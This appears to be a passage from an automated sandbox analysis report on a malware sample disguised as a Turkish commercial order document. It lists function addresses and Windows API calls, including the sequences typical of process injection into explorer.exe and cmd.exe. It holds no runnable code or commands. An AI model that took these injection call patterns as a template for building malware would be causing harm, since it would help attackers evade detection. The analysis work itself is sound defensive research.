Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2CF0 NtOpenProcess,	8_2_037C2CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2CC0 NtQueryVirtualMemory,	8_2_037C2CC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C3010 NtOpenDirectoryObject,	8_2_037C3010
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C3090 NtSetValueKey,	8_2_037C3090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C39B0 NtGetContextThread,	8_2_037C39B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C3D70 NtOpenThread,	8_2_037C3D70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C3D10 NtOpenProcessToken,	8_2_037C3D10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4A360 NtCreateFile,	8_2_02E4A360
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4A490 NtClose,	8_2_02E4A490
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4A410 NtReadFile,	8_2_02E4A410
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4A35A NtCreateFile,	8_2_02E4A35A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_02E4A40A NtReadFile,	8_2_02E4A40A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03629BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	8_2_03629BAF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0362A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	8_2_0362A036
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03629BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_03629BB2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0362A042 NtQueryInformationProcess,	8_2_0362A042

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_00794C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

8_2_00794C10

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_00799458 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,

8_2_00799458

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_010AD5DC	0_2_010AD5DC
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_04FD7BB8	0_2_04FD7BB8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_04FD0040	0_2_04FD0040
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_04FD001E	0_2_04FD001E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_04FD7BA8	0_2_04FD7BA8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F9377C	0_2_06F9377C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F94128	0_2_06F94128
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F94F80	0_2_06F94F80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F996C0	0_2_06F996C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F9A4A8	0_2_06F9A4A8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F90400	0_2_06F90400
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F903F0	0_2_06F903F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F9F050	0_2_06F9F050
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F97EC0	0_2_06F97EC0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F94F73	0_2_06F94F73
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F99AF8	0_2_06F99AF8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 0_2_06F97A80	0_2_06F97A80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_00402D87	6_2_00402D87
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041EDAD	6_2_0041EDAD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_00409E60	6_2_00409E60
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041D7A0	6_2_0041D7A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200100	6_2_01200100
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AA118	6_2_012AA118
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01298158	6_2_01298158
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D01AA	6_2_012D01AA
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C41A2	6_2_012C41A2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C81CC	6_2_012C81CC
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CA352	6_2_012CA352
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D03E6	6_2_012D03E6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E3F0	6_2_0121E3F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0274	6_2_012B0274
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012902C0	6_2_012902C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210535	6_2_01210535
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D0591	6_2_012D0591
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B4420	6_2_012B4420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C2446	6_2_012C2446
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BE4F6	6_2_012BE4F6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01234750	6_2_01234750
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120C7C0	6_2_0120C7C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122C6E0	6_2_0122C6E0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01226962	6_2_01226962
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012DA9A6	6_2_012DA9A6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121A840	6_2_0121A840
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01212840	6_2_01212840
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F68B8	6_2_011F68B8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E8F0	6_2_0123E8F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CAB40	6_2_012CAB40
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C6BD7	6_2_012C6BD7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120EA80	6_2_0120EA80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121AD00	6_2_0121AD00
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012ACD1F	6_2_012ACD1F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01228DBF	6_2_01228DBF
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120ADE0	6_2_0120ADE0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210C00	6_2_01210C00
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B0CB5	6_2_012B0CB5
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200CF2	6_2_01200CF2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01252F28	6_2_01252F28
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01230F30	6_2_01230F30
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B2F30	6_2_012B2F30
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01284F40	6_2_01284F40
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128EFA0	6_2_0128EFA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121CFE0	6_2_0121CFE0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01202FC8	6_2_01202FC8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CEE26	6_2_012CEE26
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210E59	6_2_01210E59
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222E90	6_2_01222E90
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CCE93	6_2_012CCE93
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CEEDB	6_2_012CEEDB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012DB16B	6_2_012DB16B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0124516C	6_2_0124516C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FF172	6_2_011FF172
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121B1B0	6_2_0121B1B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C70E9	6_2_012C70E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CF0E0	6_2_012CF0E0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012170C0	6_2_012170C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BF0CC	6_2_012BF0CC
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C132D	6_2_012C132D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FD34C	6_2_011FD34C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0125739A	6_2_0125739A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012152A0	6_2_012152A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B12ED	6_2_012B12ED
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122B2C0	6_2_0122B2C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C7571	6_2_012C7571
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AD5B0	6_2_012AD5B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D95C3	6_2_012D95C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CF43F	6_2_012CF43F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01201460	6_2_01201460
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CF7B0	6_2_012CF7B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01255630	6_2_01255630
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C16CC	6_2_012C16CC
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A5910	6_2_012A5910
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01219950	6_2_01219950
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122B950	6_2_0122B950
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127D800	6_2_0127D800
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012138E0	6_2_012138E0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CFB76	6_2_012CFB76
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122FB80	6_2_0122FB80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01285BF0	6_2_01285BF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0124DBF9	6_2_0124DBF9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01283A6C	6_2_01283A6C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CFA49	6_2_012CFA49
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C7A46	6_2_012C7A46
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01255AA0	6_2_01255AA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012ADAAC	6_2_012ADAAC
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B1AA3	6_2_012B1AA3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BDAC6	6_2_012BDAC6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C7D73	6_2_012C7D73
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01213D40	6_2_01213D40
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C1D5A	6_2_012C1D5A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122FDC0	6_2_0122FDC0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01289C32	6_2_01289C32
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CFCF2	6_2_012CFCF2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CFF09	6_2_012CFF09
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CFFB1	6_2_012CFFB1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01211F92	6_2_01211F92
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011D3FD5	6_2_011D3FD5
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011D3FD2	6_2_011D3FD2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01219EB0	6_2_01219EB0
Source: C:\Windows\explorer.exe	Code function: 7_2_09724912	7_2_09724912
Source: C:\Windows\explorer.exe	Code function: 7_2_0971ED02	7_2_0971ED02
Source: C:\Windows\explorer.exe	Code function: 7_2_0972A5CD	7_2_0972A5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_09726036	7_2_09726036
Source: C:\Windows\explorer.exe	Code function: 7_2_0971D082	7_2_0971D082
Source: C:\Windows\explorer.exe	Code function: 7_2_09721B32	7_2_09721B32
Source: C:\Windows\explorer.exe	Code function: 7_2_09721B30	7_2_09721B30
Source: C:\Windows\explorer.exe	Code function: 7_2_09727232	7_2_09727232
Source: C:\Windows\explorer.exe	Code function: 7_2_10464232	7_2_10464232
Source: C:\Windows\explorer.exe	Code function: 7_2_10463036	7_2_10463036
Source: C:\Windows\explorer.exe	Code function: 7_2_1045A082	7_2_1045A082
Source: C:\Windows\explorer.exe	Code function: 7_2_1045BD02	7_2_1045BD02
Source: C:\Windows\explorer.exe	Code function: 7_2_10461912	7_2_10461912
Source: C:\Windows\explorer.exe	Code function: 7_2_1045EB30	7_2_1045EB30
Source: C:\Windows\explorer.exe	Code function: 7_2_1045EB32	7_2_1045EB32
Source: C:\Windows\explorer.exe	Code function: 7_2_104675CD	7_2_104675CD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A4875	8_2_007A4875
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_00794C10	8_2_00794C10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0079540A	8_2_0079540A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007974B1	8_2_007974B1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B695A	8_2_007B695A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_00799144	8_2_00799144
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B4191	8_2_007B4191
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0079D660	8_2_0079D660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B3E66	8_2_007B3E66
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_00796E57	8_2_00796E57
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_00797A34	8_2_00797A34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0079EE03	8_2_0079EE03
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A4EC1	8_2_007A4EC1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A3EB3	8_2_007A3EB3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B769E	8_2_007B769E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A5A86	8_2_007A5A86
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A0740	8_2_007A0740
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_00796B20	8_2_00796B20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A0BF0	8_2_007A0BF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038503E6	8_2_038503E6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0379E3F0	8_2_0379E3F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384A352	8_2_0384A352
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038102C0	8_2_038102C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03830274	8_2_03830274
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038441A2	8_2_038441A2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038501AA	8_2_038501AA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038481CC	8_2_038481CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03780100	8_2_03780100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0382A118	8_2_0382A118
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03818158	8_2_03818158
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03822000	8_2_03822000
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03790770	8_2_03790770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037B4750	8_2_037B4750
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0378C7C0	8_2_0378C7C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037AC6E0	8_2_037AC6E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03850591	8_2_03850591
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03790535	8_2_03790535
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0383E4F6	8_2_0383E4F6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03834420	8_2_03834420
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03842446	8_2_03842446
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03846BD7	8_2_03846BD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384AB40	8_2_0384AB40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0378EA80	8_2_0378EA80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037A6962	8_2_037A6962
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0385A9A6	8_2_0385A9A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037929A0	8_2_037929A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0379A840	8_2_0379A840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03792840	8_2_03792840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037BE8F0	8_2_037BE8F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037768B8	8_2_037768B8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0380EFA0	8_2_0380EFA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037B0F30	8_2_037B0F30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037D2F28	8_2_037D2F28
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0379CFE0	8_2_0379CFE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03782FC8	8_2_03782FC8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03832F30	8_2_03832F30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03804F40	8_2_03804F40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384CE93	8_2_0384CE93
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03790E59	8_2_03790E59
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384EEDB	8_2_0384EEDB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384EE26	8_2_0384EE26
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037A2E90	8_2_037A2E90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0379AD00	8_2_0379AD00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0378ADE0	8_2_0378ADE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0382CD1F	8_2_0382CD1F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037A8DBF	8_2_037A8DBF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03830CB5	8_2_03830CB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03790C00	8_2_03790C00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03780CF2	8_2_03780CF2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0377D34C	8_2_0377D34C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384132D	8_2_0384132D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037D739A	8_2_037D739A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038312ED	8_2_038312ED
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037AB2C0	8_2_037AB2C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037952A0	8_2_037952A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0377F172	8_2_0377F172
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C516C	8_2_037C516C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0379B1B0	8_2_0379B1B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0385B16B	8_2_0385B16B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0383F0CC	8_2_0383F0CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384F0E0	8_2_0384F0E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038470E9	8_2_038470E9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037970C0	8_2_037970C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0384F7B0	8_2_0384F7B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038416CC	8_2_038416CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037D5630	8_2_037D5630
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0382D5B0	8_2_0382D5B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_038595C3	8_2_038595C3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03847571	8_2_03847571
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_03781460	8_2_03781460
